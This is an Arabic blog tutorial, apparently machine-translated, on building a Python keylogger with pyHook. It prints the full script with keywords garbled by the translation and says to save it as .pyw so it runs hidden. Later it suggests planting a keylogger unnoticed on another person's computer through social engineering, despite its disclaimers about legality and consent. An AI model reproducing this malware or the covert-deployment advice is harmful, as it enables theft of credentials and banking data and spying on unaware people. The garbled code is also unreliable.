القرصنةبرمجةتوصيةتكنولوجيا

كيفية إنشاء برنامج Keylogger

قبل أن أبدأ ، يجب أن أوضح ذلك يعد KEYLOGGER غير قانوني إذا تم استخدامه في جرائم، على سبيل المثال ، الحصول على بيانات وبيانات اعتماد شخص ما. هذه المقالة مخصصة للتدريب والاستخدام الأكاديمي فقط حتى تفهم كيف تعمل.

الاستخدام القانوني لبرنامج keylogger

إذا كنت تبحث عن توظيف كلوغر الرقابة الأبوية للتحكم القانوني في تصفح أطفالك ، نوصي بما يلي. ثم يجب أن تتأكد من حصولك على موافقة أطفالك وأنهم على علم بأنك تستخدم برنامج مراقبة. تحقق من التشريعات في بلدك.

ما هو برنامج Keylogger؟

Keylogger هو برنامج ضار يستخدم على نطاق واسع في عالم القرصنة. هذا البرمجيات الخبيثة يسمح لنا بتسجيل كل المحتوى الذي تم إدخاله على لوحة مفاتيح الشخص الذي يستخدم الجهاز.

إنه أمر خطير للغاية حيث يمكنه تسجيل جميع أنواع بيانات الاعتماد بما في ذلك البيانات المصرفية أو بيانات اعتماد التطبيق الأخرى التي يتم استخدامها أثناء تنشيط البرنامج.

يعد هذا البرنامج الضار معقدًا جدًا لاستخدامه عن بُعد ، فأنت بحاجة إلى معرفة كبيرة به. لكننا سنعلمك إنشاء Keylogger التي يمكنك استخدامها على جهاز الكمبيوتر المحلي الخاص بك حتى تتمكن من معرفة كيفية عملها بشكل مباشر.

احذر! إذا لم يكن جهاز الكمبيوتر الشخصي الخاص بك ، فسوف ينتهي بك الأمر بالتسجيل أوراق اعتماد شريكك, عائلة u أشخاص آخرين إذا قمت بذلك على جهازك أو إذا كان لديهم وصول إلى جهاز الكمبيوتر الخاص بك. هذا غير قانوني إذا لم يكن لديك موافقة صريحة ويجب إعلامهم بأنك تسجل بياناتهم.

سيسمح لنا إنشاء برنامج Keylogger الخاص بنا باستخدامه على جهاز الكمبيوتر الخاص بنا لحفظ جميع سجلات لوحة المفاتيح التي تم إجراؤها. أيضًا للتأكد من عدم استخدام أي شخص لمعداتنا دون إذن مسبق.

على أي حال ، سنترك لك منشورًا أكثر شرحًا حول ماهية Keylogger واستخدامه.:

كيفية إنشاء برنامج Keylogger

من أجل المضي قدمًا ، سنحتاج إلى استخدام Python 2.7 أو Pyhook أو Pywin32 أو لن نكون قادرين على عمل النص الذي سننشئه.

لتنزيل Python يمكنك القيام بذلك من هذا الرابط، وسوف يستغرق سوى بضع دقائق.

أول شيء يتعين علينا القيام به لبدء إنشاء Keywlogger هو فتح محرر Python.

داخل مستندنا الفارغ ، سنقدم الكود التالي:

كود كلوغر مجاني


استيراد pyHook و pythoncom و sys و logging
# لا تتردد في تعيين file_log إلى اسم / موقع ملف مختلف

def OnKeyboardEvent (حدث):
logging.basicConfig (اسم الملف = file_log ، المستوى = logging.DEBUG ، format = '٪ (message) s')
chr (event.Ascii)
logging.log (10، chr (event.Ascii))
العودة صحيح
hooks_manager = pyHook.HookManager ()
Hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard ()
pythoncom.PumpMessages ()

بمجرد النسخ واللصق ، ما سنفعله هو النقر فوق حفظ. من المهم أن نحفظه بالامتداد .pyw. حفظ الملف بهذه الطريقة "Keylogger.pyw".

حسنا. لدينا برنامج Keylogger جاهز لتسجيل حركات لوحة المفاتيح والبدء في التجسس على استخدام جهاز الكمبيوتر الخاص بنا. باستخدام هذا الرمز ، سيتم حفظ ضغطات المفاتيح في ملف منفصل.

حسنًا ، لنبدأ البرنامج النصي الجديد. كل ما عليك فعله هو النقر مرتين على الملف وسنبدأ تلقائيًا في تسجيل كل النشاط.

عندما نريد إيقاف تشغيل Keylogger ، سيتعين علينا فقط فتح مدير المهام (Control + Alt + Del) وإنهاء عملية Python. لذلك سنقوم بإيقاف تشغيله بالقوة.

إنهاء الثعبان مع مدير المهام. انشر حول كيفية إنشاء كيلوجر
citeia.com

الآن يأتي الجزء الممتع ، بمجرد انتهاء العملية سنذهب للعثور على الملف "keyloggeroutput.txt". سنجده في نفس الدليل حيث نحتفظ بـ Keylogger. سننقر مرتين على هذا و….

تاشان!

لدينا سجل لجميع استخدامات لوحة المفاتيح المسجلة على جهاز الكمبيوتر الخاص بنا منذ أن كان برنامج Keylogger نشطًا. لقد تعلمت بالفعل كيفية إنشاء برنامج Keylogger على جهاز الكمبيوتر الخاص بك وإجراء اختبارات معينة.

سوف نتحدث معك الآن عن حالة إصابة جهاز الكمبيوتر الخاص بك بفيروس من هذا النوع بأي وسيلة. في الواقع ، سنترك لك فيما يلي إحدى الطرق التي يمكن من خلالها زرع Keylogger على جهاز كمبيوتر الشخص ، نوصيك بقراءته.

الآن ، افترض أنك تشك في أن لديك Keylogger مثبتًا على جهاز الكمبيوتر الخاص بك ورأيت نشاطًا غريبًا ، فلا داعي للقلق. لقد أوضحنا لك بالفعل كيفية اكتشافه وإزالته يدويًا. ومع ذلك ، هناك العديد من البرامج والتطبيقات لاكتشاف Keylogger وإزالته تلقائيًا من جهاز الكمبيوتر الخاص بك ، وتعرف عليها في هذا المنشور الذي نتركه لك هنا:

إذا كنت مهتمًا بهذا النوع من الأدوات ، فاترك تعليقًا لتحديد الأداة التالية.

إذا كنت ترغب في زرع Keylogger بطريقة غير ملحوظة على جهاز كمبيوتر شخص ما ، فيمكن القيام بذلك بسهولة من خلال الهندسة الاجتماعية.

الحيل الاجتماعية والنفسية

تسمح لك الهندسة الاجتماعية بالوصول إلى طريقة تفكير شخص ما باستخدام مجموعة من المعلومات حول الضحية من أجل التخطيط لشن هجوم فعال ضد المستخدم.

إنها إحدى الطرق التي يمكن بها تكملة أي استراتيجية قرصنة (على الرغم من أنها لا تستخدم فقط في القرصنة)

إذا كنت تريد معرفة المزيد كيفية تطبيق الهندسة الاجتماعية في القرصنة أنصحك بمراجعة المقالة التالية.

هل من الممكن اختراق البشر؟ هندسة اجتماعية

الهندسة الاجتماعية
citeia.com

يمكنك أيضًا تنزيل الإصدار بتنسيق PDF مجانًا. (14 صفحة للاستخدام الأكاديمي)

يمكنك أيضًا تنزيل ملف PDF مجانًا بتنسيق Magazine لقراءته لاحقًا.

فن غلاف كتاب الهندسة الاجتماعية
ملف PDF قابل للتنزيل: # 1 الهندسة الاجتماعية للقرصنة

نأمل أن تكون مفيدة لك.

قد يثير اهتمامك: كيف أعرف إذا تم اختراق بريدي الإلكتروني؟

تعليقات 7

  1. مقال جيد جدًا ، إنه أول موقع ويب يشرح لي دون الالتفاف حول كيفية إنشاء keylogger ... شكرًا لك على عدم وضع القش على الوحش كما تفعل معظم المواقع مؤخرًا ، هل أنا الوحيد الذي يتعب؟

    تحيات

  2. تم اختراق حساب Google الخاص بأخي وأرغب في تعلم فن التحقق هذا لأنه يحزنني أن أراه حزينًا من فضلك

ترك الرد

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها ب *

يستخدم هذا الموقع Akismet لتقليل المحتوى غير المرغوب فيه. تعرف على كيفية معالجة بيانات تعليقك.